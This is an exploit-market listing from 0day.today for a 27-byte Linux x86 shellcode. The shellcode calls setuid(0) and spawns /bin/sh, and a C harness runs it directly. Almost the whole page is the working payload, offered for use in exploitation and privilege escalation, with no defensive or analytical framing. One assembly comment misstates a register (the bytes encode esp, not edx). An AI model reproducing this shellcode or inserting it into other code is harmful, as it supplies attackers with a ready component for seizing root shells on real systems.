[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 setuid(0) && execve(/bin/sh,0,0) 27 bytes

Author
vlan7
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13708
Category
shellcode
Date add
15-08-2010
Platform
linux/x86
=============================================================
linux/x86 setuid(0) && execve(/bin/sh,0,0) shellcode 27 bytes
=============================================================

#Special Thanks Inj3ct0r Exploit DataBase
#I Love Inj3ct0r.Com
#include <stdio.h>

const char sc[]= "\x31\xdb" //xor ebx,ebx
 "\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push/pop!
 "\x99" //cdq
 "\xcd\x80" //int 80 //setuid(0) should returns 0 right? ;)
 "\xb0\x0b" //mov al,0bh
 "\x52" //push edx /Termina la cadena //bin/sh con un 0
 "\x68\x6e\x2f\x73\x68" //push dword "hs/n"
 "\x68\x2f\x2f\x62\x69" //push dword "ib//"
 "\x89\xe3" //mov ebx,edx
 "\x89\xd1" //mov ecx,edx
 "\xcd\x80"; //int 80h

int main()
{
 printf("\nSMALLEST SETUID && EXECVE GNU/LINUX x86 STABLE SHELLCODE "
 "WITHOUT NULLS THAT SPAWNS A SHELL"
 "\n\nCoded by vlan7"
 "\n\t + http://www.vlan7.org"
 "\n\n[+] Date: 4/Jul/2009"
 "\n[+] Thanks to: sch3m4"
 "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(sc)-1);
 (*(void (*)()) sc)();
 return 0;
}



#  0day.today [2024-12-25]  #